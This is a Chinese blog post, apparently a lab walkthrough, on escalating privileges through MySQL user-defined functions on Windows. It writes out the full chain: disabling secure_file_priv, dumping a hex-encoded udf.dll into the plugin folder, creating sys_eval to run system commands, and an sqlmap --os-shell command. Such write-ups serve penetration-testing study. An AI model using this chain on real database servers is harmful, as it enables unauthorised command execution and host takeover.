mysql_udf提权

最新推荐文章于 2024-06-08 15:51:52 发布
最新推荐文章于 2024-06-08 15:51:52 发布
阅读量3.2k 收藏
点赞数
分类专栏: 内网渗透 渗透测试 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42383069/article/details/123296682
版权

0x00. 环境配置:

  1. 安装phpstudy,并且以系统服务模式启动
    在这里插入图片描述
  2. 创建普通用户
    在这里插入图片描述
  3. 在服务中将Apache以普通账户启动
    在这里插入图片描述
  4. 赋予apache目录下logs普通账户写入权限
    在这里插入图片描述
  5. 连接大马,测试下当前我们的权限
    在这里插入图片描述

0x01. UDF介绍与使用:

  1. 什么是udf:
    udf(Userdefined function)是用户自定义函数。在mysql中函数是什么?比如mysql中常见的sleep(),sum(),ascii()等都是函数。而udf就是为了让我们开发者能够自己写方便自己函数
  2. 为了在mysql中使用此函数,须将udf.dll放在特定文件夹下。

1.Mysql版本大于5.1,udf.dll文件必须放在MySQL安装目录的lib\plugin文件夹下(plugin文件夹默认不存在,需要创建)
2.Mysql版本小于5.1: 如果是 win 2000 的服务器,我们则需要将 udf.dll 文件导到 C:\Winnt\udf.dll 下 如果是 win2003 服务器,我们则要将 udf.dll 文件导出在 C:\Windows\udf.dll 下

  1. 在mysql中引用自定义函数
create function cmdshell return string soname 'udf.dll'
  1. 执行命令
select cmdshell("whoami");

0x02. udf提权条件

  1. 获得一个数据库账号,拥有对MySQL的insert和delete权限,以root为佳
  2. 拥有将udf.dll写入相应目录的权限
  3. mysql关闭了安全模式

0x03. udf提权过程

整体思路:

  1. 将udf文件放到指定位置(Mysql>5.1放在Mysql根目录的lib\plugin文件夹下)
  2. 从udf文件中引入自定义函数(user defined function)
  3. 执行自定义函数
  1. 获取mysql安装路径
select @@basedir;

在这里插入图片描述
关闭mysql安全模式:
修改my.ini文件,加入secure_file_priv = “”
在这里插入图片描述
2. 创建plugin文件夹
测试使用ntfs数据流创建,测试失败

select 'test' into dumpfile 'C:\\tools\\PHPTutorial\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';

在这里插入图片描述
最后手动创建
3. 将dll文件写入plugin目录,并且创建函数
创建一个表并将二进制数据插入到十六进制编码流中。你可以通过insert语句或将其分解为多个部分,然后通过update语句拼接二进制数据

create table temp(data longblob);
insert into temp(data) values (0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000000000000000000);
update temp set data = concat(data,0x33c2ede077a383b377a383b377a383b369f110b375a383b369f100b37da383b369f107b375a383b35065f8b374a383b377a382b35ba383b369f10ab376a383b369f116b375a383b369f111b376a383b369f112b376a383b35269636877a383b300000000000000000000000000000000504500006486060070b1834b00000000);
select data from temp into dumpfile "C:\\tools\\PHPTutorial\\MySQL5.7.26\\lib\\plugin\\udf.dll";
create function sys_eval returns string soname 'udf.dll';   #创建函数sys_eval

问题:在执行 create function sys_eval returns string soname ‘udf.dll’; 命令时出现 **Can’t open shared library ‘udf.dll’ (errno: 193 )**的错误
在这里插入图片描述
4. 测试执行系统命令
在将 udf.dll 文件写入plugin目录后,我们就可以使用 sys_eval 函数了。
select * from mysql.func where name = ‘sys_eval’; #查看创建的sys_eval函数
select sys_eval(‘whoami’); #执行系统命令
在这里插入图片描述

0x04. sqlmap提权

  1. 条件:开启mysql外连
    在这里插入图片描述
  2. 命令:
sqlmap.py -d "mysql://root:root@xx.xx.xx.xx:3306/mysql" --os-shell

在这里插入图片描述

Beyond My
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql.zip_ROOT_mysql提权_udf_udf mysql_提权
09-19
提权用的 udf 得到root帐号可以用这个提权
MySQL数据库入侵及防御方法
weixin_33812433的博客
07-16 543
来自:http://blog.51cto.com/simeon/1981572 作者介绍 陈小兵,高级工程师,具有丰富的信息系统项目经验及18年以上网络安全经验,现主要从事网络安全及数据库技术研究工作。《黑客攻防及实战案例解析》《Web渗透及实战案例解析》《安全之路-Web渗透及实战案例解析第二版》《黑客攻防实战加密与解密》《网络攻防实战研究:漏洞利用与提权》作者,在国内多本学术期...
MySQL 数据库渗透及漏洞利用总结
2ed
02-27 1477
MySQL 数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用 MySQL 作为其数据库支撑,目前很多架构都以 MySQL 作为数据库管理系统,例如 LAMP、和 WAMP 等。 在针对网站渗透中,很多都是跟 MySQL 数据库有关,各种 MySQL 注入,MySQL 提权MySQL 数据库 root 账号 webshell 获取等的,但没有一个对 MySQL 数据库渗透较为全...
MySQL提权UDF提权
最新发布
2301_76227305的博客
06-08 1377
udf 全称为'user defined function',意思是'用户自定义函数'。用户可以对数据库所使用的函数进行一个扩展(windows利用dll文件,linux利用so文件),那么我们就可以利用这个特点,往MySQL里面添加一个可以执行系统命令的函数即可。udf提权本质就是通过添加自定义函数让MySQL能执行系统命令,仅此而已。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
Mysql_UDF提权
热门推荐
极客神殿
02-04 1万+
Root权限一、上传udf.dll小于mysql5.1版本 C:\WINDOWS\udf.dll 或 C:\WINDOWS\system32\udf.dll 等于mysql5.1版本 %mysql%\plugin\udf.dll 用 select @@plugin_dir 查询plugin路径 默认 C:\Program Files\MySQL\MySQL Server 5.
渗透测试—提权方式总结
qq_29864185的博客
07-06 2052
目录 一、 什么是提权 二、怎样进行提权提权的方式有哪些) 1、系统漏洞提权 (1)Windows提权 (2)Linux系统提权 2、数据库提权 (1)MySQL数据库提权 3、系统配置不当提权 4、权限继承类提权 5、第三方软件/服务提权6、WebServer漏洞提权 一、 什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。 Windows:User >> System Linux:User >> Root 二、怎样进
udf提权_udf提权_udf.dll下载提权_mysql提权_ballsv6_提权_源码
10-04
mysql提权udf提权所需要的dll文件,有64位和32位
Linux利用UDF库实现Mysql提权
09-10
本篇将详细介绍如何利用UDF库来实现MySQL提权操作。 首先,提权通常涉及到获取更高的系统权限,而在MySQL中,通过UDF库可以执行系统级别的命令,从而可能达到提升权限的目的。要实现这一过程,我们需要满足以下...
mysql udf提权文件
02-01
mysql udf提权文件mysql udf提权文件
mysql_reverse_udf.zip
08-02
mysql反弹端口提权利用dll文件。
渗透测试工程师面试题目大全
broing55的博客
04-21 4575
渗透测试面试题 一.思路流程 1.信息收集 服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等) 网站指纹识别(包括,cms,cdn,证书等),dns记录 whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等) 子域名收集,旁站,C段等 google hacking针对化搜索,pdf文件,中间件版本,弱口令扫描等 扫描网站目录结构,爆后台,网站banner,测试文件...
mysql 5.5 提权,mysql提权udf提权
weixin_32085599的博客
03-17 362
弄了两三天的UDF提权复现,遇到各种坑,也尝试了在实际渗透场景中的应用,所以总结了部分经验。此篇文章主要涉及mysql数据库中udf提权的讲解、以及UDF提权可能涉及的问题。--目录结构--原理讲解0x00何谓UDF提权0x02 UDF提权步骤UDF(user defined function,即’用户自定义函数’),是mysql数据库的一个特性,允许用户写入自定义函数,对mysql功能进行扩充。...
mysql udf提权
weixin_60719780的博客
03-16 1422
udf提权只要是因为udf.dll文件,攻击者通过编写调用cmd或者shelludf.dkk文件,并且导入到一个指定的文件夹目录下,创建一个指向udf.dll的自定义函数,从而在数据库中的查询就等价于在cmd或者shell中执行命令。查询下的MySQL版本,这里我的是5.7.26,是大于5.1版本的,也就是说,我们需要找到lib\plugin这个目录,然后将我们的udf.dll文件写进去,其实这里的目录需要我们自己创建。前面做的是为了做铺垫,后面我们提权需要使用这个16进制的udf.dll文件;
MySQL UDF 提权
small_cat's home
10-22 1891
UDF 全称 User Defind Function(用户自定义函数),用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在 SQL 语句中调用,就像调用本机函数 version () 一样方便。UDF 提权是通过这样的方法来实现获取对方主机的system的shell权限,从而达到提权的目的。要实现 UDF 提权需要有一个动态链接库文件。
MySQL提权——udf提权
hackzkaq的博客
04-11 6481
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全学员——逍遥子 一、前期准备 1.Mysql udf简介 MySQL udf(user definedfunction,用户定义函数),为用户提供了一种高效创建函数的方式。udf函数按其运行模式可以分为单次调用型和聚集函数型两类,单次调用型函数能够针对数据库查询的每一行记录进行处理,聚集函数型用于处理Group By等聚集查询。 2.udf提权原理 udf的设计初衷是为了方便用户自定义一些函数,方便查询一些复杂的数据,同时也增加了使用udf提权的可能
Mysql提权UDF提权
一个普普通通的博客
04-17 912
数据库提权较为实用,但只有在root权限才可以提权 mysql提权udf提权) 借用于mysql func,对认证的用户,只要拥有INSERT和DELETE权限,就可以在任意数据库下l创建一个函数攻击数据库 拿到webshell后先看数据库,一般存放于inc目录,配置文件是config.php 拿到账号密码直接登录 传udf.dll mysql版本大于5.1时,udf.dll要放在mysql\lib\plugin目录下,小于5.1时,文件放在C盘windows目录或windows32 如果没有plug
内网渗透之——mysql数据库提权之——UDF提权
wsnbbz的博客
03-11 1982
介绍 UDFmysql的一个拓展接口,UDF(Userdefined function)可翻译为用户自定义函数,这个是用来拓展Mysql的技术手段。 原理 UDF可以理解为MySQL的函数库,可以利用UDF定义创建函数(其中包括了执行系统命令的函数),要想利用udf,必须上传udf.dll作为udf的执行库,mysql中支持UDF扩展 ,使得我们可以调用DLL里面的函数来实现一些特殊的功能...
[WEB安全]MySQl提权 mof、udf过程详解
网络安全知识分享
12-17 3223
MySQL提权〇、Mysql提权的必备条件1、Mysql密码查询2、利用ntfs特性创建文件夹3、常用的sql基础查询命令一、mof提权0、环境搭建1、原理2、条件3、开始4、删号二、UDF提权0、原理1、步骤2、实操 〇、Mysql提权的必备条件 Mysql的服务没有降权,并且需要获取Mysql root账号密码 使用net user命令查看系统当前帐号,如果出现Mysql这类用户,则系统可能进行了降权 1、Mysql密码查询 1、root密码查询 # MySQL <= 5.6 版本 selec
记一次UDF提权实验
一个打渔的的博客K6uQ5H7^ff(R
03-09 283
简介UDF提权 UDF提权是数据库漏洞提权mysql提权的一种。UDFMysql的一个拓展接口,也可称为用户自定义函数,它是用来拓展Mysql的技术手段,可以说是数据库功能的一种拓展,用户通过自定义函数在Mysql中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用 UDF提权是利用Mysql的自定义函数功能,将Mysql账号转化为系统sysytem权限。 提权条件 1)Mysql版本...
mysqludf提权
10-15
但是,如果攻击者能够创建自己的UDF并将其加载到MySQL中,则可以利用UDF提权攻击,从而获得系统管理员权限。 攻击者可以通过以下步骤进行UDF提权攻击: 1. 创建一个恶意的UDF库文件,其中包含提权代码。 2. 将恶意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值